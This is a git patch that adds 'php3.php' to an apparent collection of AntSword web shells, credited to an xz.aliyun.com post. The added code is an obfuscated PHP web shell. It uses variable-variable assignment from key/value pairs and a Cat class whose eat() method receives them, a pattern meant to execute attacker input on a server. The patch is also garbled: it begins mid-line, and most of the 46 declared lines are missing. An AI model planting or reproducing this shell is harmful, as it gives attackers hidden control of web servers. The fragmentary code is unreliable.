From 2c42c91689e6686c6bdf7c195e4319c949d54eba Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Sun, 15 Aug 2021 16:15:40 +0800 Subject: [PATCH] add php3.php from : https://xz.aliyun.com/t/9218 --- antSword-shells/php3.php | 46 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 antSword-shells/php3.php diff --git a/antSword-shells/php3.php b/antSword-shells/php3.php new file mode 100644 index 0000000..c0d8a4a --- /dev/null +++ b/antSword-shells/php3.php @@ -0,0 +1,46 @@ +$_value) { + $$_key= $_value; + } +} + + +$cat = new Cat(); +$cat->eat($_key, $_value);